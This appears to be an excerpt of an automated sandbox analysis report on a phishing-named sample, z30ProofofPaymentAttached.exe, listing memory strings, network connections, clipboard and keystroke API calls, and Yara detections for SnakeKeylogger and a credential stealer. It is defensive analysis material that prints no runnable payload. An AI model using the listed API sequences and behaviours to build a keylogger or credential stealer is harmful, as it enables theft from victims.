Source: RegSvcs.exe, 00000007.00000002.3735021208.0000000003E41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RegSvcs.exe, 00000007.00000002.3735021208.0000000003E41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RegSvcs.exe, 00000007.00000002.3733442866.0000000002EE2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000002E72000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000002F0A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: z30ProofofPaymentAttached.exe, 00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000002E72000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3731165395.0000000000402000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 00000007.00000002.3733442866.0000000002F0A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.187
Source: RegSvcs.exe, 00000007.00000002.3733442866.0000000002EE2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000002E9D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000002F0A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.187$
Source: RegSvcs.exe, 00000007.00000002.3735021208.0000000003E41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: RegSvcs.exe, 00000007.00000002.3735021208.0000000003E41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: RegSvcs.exe, 00000007.00000002.3733442866.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000002FDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: RegSvcs.exe, 00000007.00000002.3733442866.0000000002FDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/8
Source: RegSvcs.exe, 00000007.00000002.3733442866.0000000002FE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/lB
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49780 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_01006B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 1_2_01006B0C
Contains functionality to modify clipboard data
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_01006D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 1_2_01006D07
Contains functionality to read the clipboard data
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_01006B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 1_2_01006B0C
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FF2B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState, 1_2_00FF2B37

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 1.2.z30ProofofPaymentAttached.exe.f60000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.z30ProofofPaymentAttached.exe.f60000.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.z30ProofofPaymentAttached.exe.f60000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.z30ProofofPaymentAttached.exe.f60000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.z30ProofofPaymentAttached.exe.f60000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.z30ProofofPaymentAttached.exe.f60000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000007.00000002.3731165395.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: z30ProofofPaymentAttached.exe PID: 7304, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 7712, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Binary is likely a compiled AutoIt script file
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: This is a third-party compiled AutoIt script. 1_2_00FB3D19
Source: z30ProofofPaymentAttached.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: z30ProofofPaymentAttached.exe, 00000001.00000000.1266319162.000000000105E000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_f7f34789-d
Source: z30ProofofPaymentAttached.exe, 00000001.00000000.1266319162.000000000105E000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_dd92407e-0
Source: z30ProofofPaymentAttached.exe String found in binary or memory: This is a third-party compiled AutoIt script. memstr_a0f2ba67-4
Source: z30ProofofPaymentAttached.exe String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_e04627a3-2
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: z30ProofofPaymentAttached.exe
Abnormal high CPU Usage
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process Stats: CPU usage > 49%
Contains functionality to communicate with device drivers
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FF6685: CreateFileW,DeviceIoControl,CloseHandle, 1_2_00FF6685
Contains functionality to launch a process as a different user
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FEACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 1_2_00FEACC5
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FF79D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 1_2_00FF79D3
Detected potential crypto function
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FDB043 1_2_00FDB043
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FC3200 1_2_00FC3200
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FC3B70 1_2_00FC3B70
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FE410F 1_2_00FE410F
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FD02A4 1_2_00FD02A4
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FBE3B0 1_2_00FBE3B0
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FE038E 1_2_00FE038E
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FD06D9 1_2_00FD06D9
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FE467F 1_2_00FE467F
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FE4BEF 1_2_00FE4BEF
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_0101AACE 1_2_0101AACE
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FDCCC1 1_2_00FDCCC1
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FBAF50 1_2_00FBAF50
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FB6F07 1_2_00FB6F07
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_010131BC 1_2_010131BC
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FDD1B9 1_2_00FDD1B9
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FCB11F 1_2_00FCB11F
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FE724D 1_2_00FE724D
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FD123A 1_2_00FD123A
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FB93F0 1_2_00FB93F0
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FF13CA 1_2_00FF13CA
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FCF563 1_2_00FCF563
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FFB6CC 1_2_00FFB6CC
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FB96C0 1_2_00FB96C0
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FB77B0 1_2_00FB77B0
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FE79C9 1_2_00FE79C9
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FCFA57 1_2_00FCFA57
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FB9B60 1_2_00FB9B60
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FB7D19 1_2_00FB7D19
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FD9ED0 1_2_00FD9ED0
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FCFE6F 1_2_00FCFE6F
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00FB7FA3 1_2_00FB7FA3
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: 1_2_00A1CEE8 1_2_00A1CEE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_00BE3CA8 7_2_00BE3CA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_00BED6F8 7_2_00BED6F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_00BE8751 7_2_00BE8751
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_00BE38CC 7_2_00BE38CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_00BE5830 7_2_00BE5830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_00BE6948 7_2_00BE6948
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0141C146 7_2_0141C146
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01415362 7_2_01415362
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0141D27D 7_2_0141D27D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0141C473 7_2_0141C473
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0141C738 7_2_0141C738
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0141E988 7_2_0141E988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014169A9 7_2_014169A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01413B95 7_2_01413B95
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0141CA0D 7_2_0141CA0D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0141CCDD 7_2_0141CCDD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01416FC8 7_2_01416FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0141CFA9 7_2_0141CFA9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0141F961 7_2_0141F961
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0141E97B 7_2_0141E97B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014129EC 7_2_014129EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01413AA1 7_2_01413AA1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01413E09 7_2_01413E09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_067C1E80 7_2_067C1E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_067C0B30 7_2_067C0B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_067C17A0 7_2_067C17A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_067C9C70 7_2_067C9C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_067CFC68 7_2_067CFC68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_067C5028 7_2_067C5028
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_067CF810 7_2_067CF810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_067C2968 7_2_067C2968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_067C9548 7_2_067C9548
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_067C1E70 7_2_067C1E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_067CE258 7_2_067CE258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_067CE24B 7_2_067CE24B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_067CDE00 7_2_067CDE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_067CEAF8 7_2_067CEAF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_067CE6B0 7_2_067CE6B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_067CE6AF 7_2_067CE6AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_067CE6A0 7_2_067CE6A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_067CEF60 7_2_067CEF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_067CEF51 7_2_067CEF51
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_067C9328 7_2_067C9328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_067C0B28 7_2_067C0B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_067C9B1E 7_2_067C9B1E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_067CEB08 7_2_067CEB08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_067CF3B8 7_2_067CF3B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_067CF3A8 7_2_067CF3A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_067C8BA0 7_2_067C8BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_067C8B91 7_2_067C8B91
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_067C178F 7_2_067C178F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_067C0040 7_2_067C0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_067C0038 7_2_067C0038
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_067C5018 7_2_067C5018
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_067CF803 7_2_067CF803
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_067CD0F8 7_2_067CD0F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_067CCCA0 7_2_067CCCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_067CCC8F 7_2_067CCC8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_067C295B 7_2_067C295B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_067CD550 7_2_067CD550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_067CD540 7_2_067CD540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_067CDDFF 7_2_067CDDFF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_067CDDF1 7_2_067CDDF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_067CD9A8 7_2_067CD9A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_067CD999 7_2_067CD999
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: String function: 00FD6AC0 appears 42 times
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: String function: 00FCEC2F appears 68 times
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe Code function: String function: 00FDF8A0 appears 35 times
Sample file is different than original file name gathered from version info
Source: z30ProofofPaymentAttached.exe, 00000001.00000003.1283780330.00000000036DD000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs z30ProofofPaymentAttached.exe
Source: z30ProofofPaymentAttached.exe, 00000001.00000003.1287142771.0000000003533000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs z30ProofofPaymentAttached.exe
Source: z30ProofofPaymentAttached.exe, 00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs z30ProofofPaymentAttached.exe
Uses 32bit PE files
Source: z30ProofofPaymentAttached.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Yara signature match
Source: 1.2.z30ProofofPaymentAttached.exe.f60000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.z30ProofofPaymentAttached.exe.f60000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.z30ProofofPaymentAttached.exe.f60000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.z30ProofofPaymentAttached.exe.f60000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.z30ProofofPaymentAttached.exe.f60000.0.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.z30ProofofPaymentAttached.exe.f60000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
